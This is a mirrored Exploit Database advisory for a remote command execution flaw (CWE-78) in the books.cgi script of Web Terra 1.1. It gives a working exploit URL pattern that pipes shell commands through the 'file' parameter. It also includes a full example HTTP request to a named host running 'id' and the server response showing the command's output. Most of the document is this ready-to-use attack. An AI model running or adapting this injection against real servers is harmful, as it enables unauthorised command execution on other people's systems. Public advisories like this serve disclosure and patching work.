Web Terra 1.1 – ‘books.cgi’ Remote Command Execution

• Exploit Database
• 15 阅读

• 作者： felipe andrian
  日期： 2014-05-24
• 类别：

  • webapps
  平台：

  • cgi
• 来源：https://www.exploit-db.com/exploits/33494/

• [+] Remote Comand Execution on books.cgi Web Terra v. 1.1
  [+] Date: 21/05/2014
  [+] CWE number: CWE-78
  [+] Risk: High
  [+] Author: Felipe Andrian Peixoto
  [+] Contact: felipe_andrian@hotmail.com
  [+] Tested on: Windows 7 and Linux
  [+] Vendor Homepage: http://www2.inforyoma.or.jp/~terra
  [+] Vulnerable File: books.cgi
  [+] Version : 1.1
  [+] Exploit: http://host/patch/books.cgi?file=|<command>|
  
  
  [+] Example Request:
  GET /webnovel/books.cgi?file=|id| HTTP/1.1
  Host: redsuns.x0.com
  User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
  Accept-Encoding: gzip, deflate
  DNT: 1
  Connection: keep-alive
  
  
  HTTP/1.1 200 OK
  Date: Wed, 21 May 2014 18:59:05 GMT
  Server: Apache/1.3.42 (Unix)
  Connection: close
  Content-Type: text/html
  Content-Length: 498
  
  <!DOCTYPE HTML PUBLIC -//IETF//DTD HTML//EN>
  <html><head>
  <meta http-equiv=Content-Type content=text/html; charset=x-sjis>
  <title></title></head>
  <body bgcolor=#637057>
  <p align=center><font size=3></font><br>
  | <a href=booksregist.cgi?file=|id|&subject=>?·?M?·?é</a>
   || <a href=booksvew.cgi?file=|id|&subject=>???Ò?ê??</a>
   || <a href=booksedit.cgi?file=|id|&subject=>?ύX?ù³</a>
   || <a href=books.htm>?¶?É?É?ß?é</a>
   |</p><hr>
  uid=1085(spider) gid=1000(users) groups=1000(users)
  </body></html>
  
  [+] More About : http://cwe.mitre.org/data/definitions/78.html